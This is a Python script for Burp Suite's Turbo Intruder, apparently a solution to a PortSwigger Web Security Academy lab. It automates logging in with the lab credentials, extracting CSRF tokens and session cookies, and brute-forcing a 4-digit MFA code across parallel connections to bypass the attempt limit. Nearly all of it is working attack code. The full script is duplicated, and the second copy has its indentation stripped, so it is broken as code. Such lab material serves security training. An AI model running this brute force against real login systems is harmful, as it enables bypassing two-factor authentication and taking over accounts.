rkhan99e/multi-step-request.py

## multi-step-request.py
import re
import time

# Parameters to configure
re_csrf = 'name="csrf" value="([\w\d]+)"'
re_session = 'session=([\w\d]+)'
url='https://0add0030040299378166d901002800a1.web-security-academy.net'
delay=1 #sec
max_concurrent=5
max_thread=10
req_count=20

def queueRequests(target, wordlists):
  global engine

  # Set one request per one connection to avoid violations of the execution logic;
  # the number of connections depends on the app's capacity.

  # All these values have to be calibrated for different servers.
  # The task server doesn't endure high loads well; so, five parallel connections will be enough
  engine = RequestEngine(endpoint=url,
                         concurrentConnections=max_concurrent,
                         requestsPerConnection=max_thread)
  # Send initial requests that will trigger subsequent requests.
  # Set a 1-second delay to that the threads aren't executed synchronically but alternate.
  for x in xrange(1,req_count):
    print ('1. GET /login Request')
    engine.queue(target.req, '')
    # time.sleep(delay)

def handleResponse(req, interesting):
  global engine
  global iterable

  #table.add(req)

  if 'HTTP/1.1 302 Found' in req.response and 'Location: /my-account?id=wiener' in req.response:
    # If you get this header in the response, when you have won!
    match_session = re.search(re_session, req.response)
    req = '''GET /my-account?id=wiener HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
    print ('4. GET /my-account?id=wiener Request')
    engine.queue(req, match_session.group(1))
    return None


  if 'Incorrect security code' in req.response:
    # If the response says that the entered code is incorrect, it means that one attempt was used, and you launch a new iteration of requests.
    table.add(req)
    print ('1. GET /login Request')
    engine.queue(target.req,'')
    return None

  if 'Please enter your 4-digit security code' in req.response:
    # If the response prompts you to enter OTP, send a request with an attempt to enter OTP.
    match_csrf = re.search(re_csrf, req.response)
    match_session = re.search(re_session, req.getRequest())
    req = '''POST /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n\r\ncsrf=%s&mfa-code=%s'''
    print '4. POST /login2 Request'
    engine.queue(req, [match_session.group(1),match_csrf.group(1),str(iterable).zfill(4)])
    iterable += 1
    print 'Iterable: ' + str(iterable)
    return None

  if 'Location: /login2' in req.response:
    # If the response says that you have been redirected to the /login2 page, it means that you have previously entered the correct credentials; now you receive a new session ID and go to the page where you will retrieve CSRF required for a request with OTP.
    match_session = re.search(re_session, req.response)
    req = '''GET /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
    print '3. GET /login2 Request'
    engine.queue(req, match_session.group(1))
    return None

  if '<form class=login-form method=POST action="/login">' in req.response:
    # If the first request was executed successfully, you find yourself on the page prompting to enter the login and password. Enter the requested login and password.
    match_session = re.search(re_session, req.response)
    match_csrf = re.search(re_csrf, req.response)
    req = '''POST /login HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 70\r\n\r\ncsrf=%s&username=wiener&password=peter'''
    print ('2. POST /login Request')
    engine.queue(req, [match_session.group(1),match_csrf.group(1)])
    return None

  if 'HTTP/1.1 200 OK' in req.response and 'Store credit: $100.00' in req.response:
    # If you get this header in the response, when you have won!
    table.add(req)
    print ('Win')
    return None
	import re
	import time

	# Parameters to configure
	re_csrf = 'name="csrf" value="([\w\d]+)"'
	re_session = 'session=([\w\d]+)'
	url='https://0add0030040299378166d901002800a1.web-security-academy.net'
	delay=1 #sec
	max_concurrent=5
	max_thread=10
	req_count=20

	def queueRequests(target, wordlists):
	global engine

	# Set one request per one connection to avoid violations of the execution logic;
	# the number of connections depends on the app's capacity.

	# All these values have to be calibrated for different servers.
	# The task server doesn't endure high loads well; so, five parallel connections will be enough
	engine = RequestEngine(endpoint=url,
	concurrentConnections=max_concurrent,
	requestsPerConnection=max_thread)
	# Send initial requests that will trigger subsequent requests.
	# Set a 1-second delay to that the threads aren't executed synchronically but alternate.
	for x in xrange(1,req_count):
	print ('1. GET /login Request')
	engine.queue(target.req, '')
	# time.sleep(delay)

	def handleResponse(req, interesting):
	global engine
	global iterable

	#table.add(req)

	if 'HTTP/1.1 302 Found' in req.response and 'Location: /my-account?id=wiener' in req.response:
	# If you get this header in the response, when you have won!
	match_session = re.search(re_session, req.response)
	req = '''GET /my-account?id=wiener HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
	print ('4. GET /my-account?id=wiener Request')
	engine.queue(req, match_session.group(1))
	return None


	if 'Incorrect security code' in req.response:
	# If the response says that the entered code is incorrect, it means that one attempt was used, and you launch a new iteration of requests.
	table.add(req)
	print ('1. GET /login Request')
	engine.queue(target.req,'')
	return None

	if 'Please enter your 4-digit security code' in req.response:
	# If the response prompts you to enter OTP, send a request with an attempt to enter OTP.
	match_csrf = re.search(re_csrf, req.response)
	match_session = re.search(re_session, req.getRequest())
	req = '''POST /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n\r\ncsrf=%s&mfa-code=%s'''
	print '4. POST /login2 Request'
	engine.queue(req, [match_session.group(1),match_csrf.group(1),str(iterable).zfill(4)])
	iterable += 1
	print 'Iterable: ' + str(iterable)
	return None

	if 'Location: /login2' in req.response:
	# If the response says that you have been redirected to the /login2 page, it means that you have previously entered the correct credentials; now you receive a new session ID and go to the page where you will retrieve CSRF required for a request with OTP.
	match_session = re.search(re_session, req.response)
	req = '''GET /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
	print '3. GET /login2 Request'
	engine.queue(req, match_session.group(1))
	return None

	if '<form class=login-form method=POST action="/login">' in req.response:
	# If the first request was executed successfully, you find yourself on the page prompting to enter the login and password. Enter the requested login and password.
	match_session = re.search(re_session, req.response)
	match_csrf = re.search(re_csrf, req.response)
	req = '''POST /login HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 70\r\n\r\ncsrf=%s&username=wiener&password=peter'''
	print ('2. POST /login Request')
	engine.queue(req, [match_session.group(1),match_csrf.group(1)])
	return None

	if 'HTTP/1.1 200 OK' in req.response and 'Store credit: $100.00' in req.response:
	# If you get this header in the response, when you have won!
	table.add(req)
	print ('Win')
	return None